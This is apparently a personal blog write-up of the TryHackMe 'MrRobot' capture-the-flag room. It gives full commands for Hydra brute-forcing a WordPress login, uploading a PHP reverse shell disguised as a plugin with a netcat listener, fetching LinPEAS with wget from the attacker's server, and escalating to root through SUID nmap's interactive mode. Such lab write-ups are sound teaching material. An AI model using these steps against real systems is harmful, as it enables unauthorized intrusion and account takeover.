Written by Marc

MrRobot THM Writeup

This is the first write up I have done in a while and the first I have done for THM! This one is quite a long one as there are a few more steps with it being rated as an intermediate room, but if you work through it logically you can do it!

Tools Used

If you need help finding these, please check out my links page, the ones I’ve listed are ones that don’t come by default with Kali.

PHP Reverse Shell

LinPEAS

BurpSuite (If your unsure how to use this, please complete the room THM has on this)

CrackStation.net

Brief

From the brief, there was nothing much to gain other than there are 3 flags to capture and they are listed as key 1 etc. I’m guessing they wont be called that. Having never watched Mr Robot I’m hoping this doesn’t put me at a disadvantage.

Enumeration

Like all CTF’s, I started out by doing my nmap scan with my usual syntax

nmap -sC -Pn -sV -oN ./nmap/initial <TARGET_IP>

I found these results from nmap

enumerating a host for discovery

So looks like my main option is going to be through the website

From the website, it is a console emulation program that is running on the site, from the interaction when this loaded I knew this was a honeypot so decided to try it another way.

I did a Gobuster scan using the syntax below

gobuster dir -u <TARGET_IP> -w /usr/share/wordlists/dirbuster/big.txt -x html,php,txt

From this scan I found quite a few directories, the 2 that I’m interested in though are the robots.txt and wp-login.

going to the robots.txt file I found two interesting files.

showing the robots.txt of a ctf

Well, key 1 of 3 sounds great so i opened that and got my first key, I then download the .dic file.

From reading this I could tell it was a genuine dictionary file so I’m guessing some password cracking is coming up.

WordPress Login

So, onto the wp-login page,

I knew from looking at this that I didn’t have a username or password so after checking the page source code quickly to see if any names were contained within it like code comments or messages I decided to try the dictionary to get me the username and password.

starting an exploit of wordpress

Luckily…… It gives me an error telling me my username was invalid so I captured the login request using burpsuite and got the below.

using burpsuite to show the login

That last line is exactly what I’m looking for so I can build my hydra command which was

hydra -L fsocity.dic -p guessing <TARGET_IP> http-post-form "/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.129.236%2Fwp-admin%2F&testcookie=1:F=Invalid username"

Hydra came back really quickly and I was able to get the username

using hydra to crack a password

Now just a slight modification to my hydra syntax and I’ve got the password too!

hydra -l Elliot -P fsocity.dic 10.10.129.236 http-post-form "/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.129.236%2Fwp-admin%2F&testcookie=1:S=302"

And we are logged in!!

showing a sucessful login

Getting a Shell

So, I appreciate at this point there is a few different ways I could do this and had a few things go through my head, but I decided to go with installing a PHP Reverse shell set up to act as plugin for WordPress so I’m going with that.

If you don’t have one already made, that’s fine, use the PHP Reverse Shell from Pentest Monkey then paste the code below into line 2 (The comment block).

If your using this for the first time, scroll down and change the IP address to your IP and port to whatever port you want to set your listener on.

/*
Plugin Name:  Super Safe Plugin
Plugin URI: http://mindyour.biz
Description: This is super not suspicious
Version: 1.0
Author: Trustworthy Person
Author URI: http://trust.me
Text Domain: shell
Domain Path: /languages
*/

Once you have your zip file upload into WordPress as a plugin but don’t activate it just yet.

installing a wordpress plugin

We need to set a listener up first on our Kali machine (or whatever machine your using). The 9002 is the port I set within my PHP reverse shell.

nc -lvnp 9002
reverse listener using netcat

Once I have my listener set, i can click “Activate” on the WordPress page and I’ve got my shell.

sucessful reverse shell

From here I’m going to find what I can access, I decided to start with home directories, there was only 1 user though.

cd home
cd robot

In here, I found 2 files, one was the key which I tried to read but I couldn’t because of my rights, the other a very vulnerable looking MD5!

directory of a compromised machine

Well, since this is named md5….. I’m going to go with this is MD5, I could have put this through Hashcat but in all seriousness I used crackstation just because it was quicker to copy what I had in front of me into there.

crackstation cracking an md5

That took literally no time at all and I’ve got the password for the robot account.

So this is where I ran into a snag as i couldn’t use the su command to switch users in my current shell so I need to upgrade my shell and upgrade my privileges.

Time for Uprades!

So my plan from this point forward, upgrade my shell, switch to the robot user then escalate my privilege.

I learnt a really quick way to upgrade these from an article from ropnop which is in my useful links, if you didnt know how to do this, I really want you to go read the link and learn it!

python -c 'import pty; pty.spawn("/bin/bash")'
upgrading the shell

From there we can get key 2!

PrivEsc

So now I had my user account I knew I was working on the assumption the final flag was in root as i couldn’t access it!!

I decided to use LinPEAS so I uploaded this with a HTTP Server (which I started within the terminal from the folder I had this saved in to make it easier)

This is where something like Tilix really helps as you can easily have your webserver running in the same console window.

To start the webserver, run this command from a terminal that is not your reverse shell (this command is case sensitive).

python -m SimpleHTTPServer

Then in your reverse shell first go into the temp folder with

cd /tmp

Once in the temp folder, again on your reverse shell you can use the command below to download LinPEAS into the targets tmp directory.

wget http://<your_ip>:<your_port>/linpeas.sh

Once youve downloaded this, LinPEAS needs marking as an executable with

chmod +x linpeas.sh

This can then be run with

./linpeas.sh

Once this has run there is a lot of information on there, I usually go to the SUID section first for privesc and on our Target Machine this is what it came back with.

linpeas being used to enumerate a machine

When LinPEAS marks something in yellow, you know its gotta be good. Even without that, NMAP having a SUID does stand out.

So I checked the version just by typing nmap into the command line and found it was version 3.81, didn’t some previous versions have an interactive mode?????

nmap --interactive

I used that and indeed it did have interactive mode available

It was then a simple command to then get a shell

!sh
nmap in interactive mode

So lets go to the root directory and see what we find

final completion of a ctf

And we have our final key!!

Conclusion

I realise this is probably a long writeup, but I wanted to cover everything just incase anyone reading was having trouble with this room.

I really liked this room as it tries to grab your attention with the website first and when your past that, it does use a lot of different skills which if you didn’t already have, would be a great way to learn them.

Thanks to ben at tryhackme for the challenge!